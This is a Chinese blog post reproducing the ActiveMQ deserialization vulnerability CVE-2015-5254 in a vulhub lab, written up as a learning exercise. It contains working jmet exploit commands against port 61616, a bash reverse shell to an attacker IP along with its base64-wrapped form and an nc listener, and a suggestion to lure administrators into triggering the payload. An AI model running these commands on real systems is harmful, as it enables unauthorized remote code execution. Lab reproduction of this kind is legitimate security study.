【vulhub】ActiveMQ反序列化漏洞复现学习 CVE-2015-5254

已于 2023-12-27 15:11:41 修改
阅读量953 收藏 23
点赞数 25
文章标签: activemq 学习 web安全
于 2023-12-27 15:02:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sulpice92/article/details/135245672
版权

ActiveMQ反序列化漏洞 CVE-2015-5254

一、相关说明

1.1 准备

  1. vulhub环境用来启动漏洞;
  2. 下载工具jmet;
  3. 自己常用的攻击机包含常见工具。

1.2 activemq

全名Apache ActiveMQ,是阿帕奇的一套开源消息中间件,支持java消息服务、集群、Spring Framework等。

关于消息中间件我也不是很理解具体的原理,有好的说明文章可以分享给我。

我简单理解的就是,销售卖了东西(前端修改数据)就要去仓库拿货(发送请求修改数据库),因为实际操作了数据库,所以响应速度慢,MQ就像是一个仓库登记员,销售卖了东西不用自己去仓库,只需要和登记员登记下,等不忙的时候,再去按登记的数据对仓库处理,这样响应速度就变快了。

1.3 关于漏洞

漏洞存在于Apache ActiveMQ 5.13.0之前的5.x版本中

该漏洞源于没有限制可在代理中序列化的类,远程攻击者可借助特制的序列化的JMS ObjectMessage对象利用该漏洞执行任意代码。

1.4 利用说明

开启环境后,将会监听两个端口,61616和8161,其中616116是工作端口,消息在这个端口传递,8161是web管理页面

使用jmet进行漏洞利用,首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在错误);jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

然后构造(可以用ysoserial)可执行命令的序列化对象

作为一个消息,发送给目标61616端口

访问web管理页面,读取消息,触发漏洞

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

注意通过web管理页面访问消息并触发这个漏洞需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问时触发。

二、漏洞复现

2.1 洞基础复现

先启动环境

cd /usr/vulhub/activemq/CVE-2015-5254/
//到vulhub的环境中去

docker compose up -d
//启动环境

docker ps -a
//查看容器

docker compose down -v
//关闭容器

下载jmet https://github.com/matthiaskaiser/jmet,主要是这个jar文件,其他的不需要

ActiveMQ反序列化漏洞-2.1-1

到这个jar的存放目录执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.192.200 61616
ActiveMQ反序列化漏洞-2.1-2

发送成功,访问下web看看

ActiveMQ反序列化漏洞-2.1-3

默认口令admin/admin

ActiveMQ反序列化漏洞-2.1-4

可以看到发送了一条消息

ActiveMQ反序列化漏洞-2.1-5

去docker容器下验证一下,可以看见tmp目录下新建了一个文件夹success

ActiveMQ反序列化漏洞-2.1-6

2.2漏洞进一步利用

上面复现的过程可以看到,漏洞的利用是命令执行,且没有即时的返回(需要activemq处理消息时才会执行),xcw所以选用反弹shell的方式利用该漏洞。

先写个反弹shell,base64编码

bash -i >& /dev/tcp/192.168.192.129/29981 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xMjkvMjk5ODEgMD4mMQ==

ActiveMQ反序列化漏洞-2.2-1

然后在攻击机上开个监听

nc -nvlp 29981

通过漏洞上传反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xMjkvMjk5ODEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.192.200 61616

ActiveMQ反序列化漏洞-2.2-2

访问web执行,可以看到成功反弹shell

ActiveMQ反序列化漏洞-2.2-3

三、复盘总结

3.1 遇到的问题

  1. 反弹shell这里不熟悉,记得有个大概,但具体的给忘了,也不清楚为啥这个shell需要base64加密;
  2. 中间件不了解,几乎三分之一的时间用于学习这个中间件的用途,清晰他的概念;
  3. 英语水平不足,用到了一个工具jmet,看不懂文献,也没找到中文说明,除了复制粘贴还是没学会使用。

3.2 实战利用

  1. 首先问题是版本:漏洞存在于Apache ActiveMQ 5.13.0之前的5.x版本中;

  2. 其次问题是触发:该漏洞需要中间件发送这条信息才能利用,但是根据消息中间件的工作原理,我即刻上传了不一定即刻发送,可能等一个小时甚至等一天才行;

  3. 最后是收益问题:支持分布式部署,也就是可以不用和服务器数据库放在一台主机上,甚至放在docker容器也可以,实战环境下,能否从docker环境中跳出到主机或者横向不能确定。

3.3 总结

时间花了不少,但还是模模糊糊的没搞太清楚,也不知道上面的理解和思路有没有问题,慢慢学,加油。

赛博摆烂獭獭
关注
  • 25
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7629
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
ActiveMQ反序列化漏洞原理+复现
ChenD的学习笔记
03-09 2212
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
activemq系列漏洞复现
m0_49420271的博客
06-07 2853
vulhubactivemq系列漏洞复现
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 1119
Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
ActiveMQ 反序列化漏洞CVE-2015-5254
The code way of kinnisoy
10-24 2000
ActiveMQ 反序列化漏洞CVE-2015-5254
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
boot-example-activemq-topic-2.0.5
01-27
SpringBoot+ActiveMQ-发布订阅 Topic 主题 * 消息消费者(订阅方式)消费该消息 * 消费生产者将发布到topic中,同时有多个消息消费者(订阅)消费该消息 * 这种方式和点对点方式不同,发布到topic的消息会被所有...
activemq-cpp-library-3.9.5-src.zip
06-10
ActiveMQ-CPP库3.9.5源代码解析与应用》 ActiveMQ-CPP库是Apache ActiveMQ项目的一部分,它提供了一套C++接口,用于与ActiveMQ消息代理进行通信。这个库允许开发者在C++应用程序中实现高级消息队列协议(AMQP)和...
vulhub漏洞复现学习activemq
最新发布
m0_60720031的博客
03-07 854
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信,WEB管理页面默认端口为8161。
vulhub漏洞复现ActiveMQ 反序列化漏洞 (CVE-2015-5254)
2301_76881678的博客
09-13 310
vulhub漏洞复现-ActiveMQ 反序列化漏洞 (CVE-2015-5254)
vulhub靶场漏洞复现——ActiveMQ
pigzlfa的博客
09-14 296
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ详解文章链接——消息中间件ActiveMQ链接web管理端口工作(消息传递)端口816161616。
vulhub ActiveMQ 反序列化漏洞CVE-2015-5254
panyu_123的博客
09-18 141
第一次去查看时,没有创建的success文件,我以为有延迟,其实是需要人为点击web页面消息后,该命令才会被触发。(利用过程第三步有说明,是我没看仔细,又暴露我自身的一个问题,要好好看教程,要仔细呀!JMSDestination=event(登录后台时需要输入用户名密码,默认是admin/admin,之前测试遇到过这样的弹窗,那时还不知道是activemq中间件,今日新知识get)-Yp指定payload类型,选择的是ROME,其后是ActiveMQ所在机器的ip及工作端口。之后就开始下载环境。
CVE-2023-46604 Apache ActiveMQ RCE漏洞
mirocky的博客
12-21 2864
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3497
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2846
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
ActiveMQ漏洞合集
LainWith的博客
12-26 1393
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值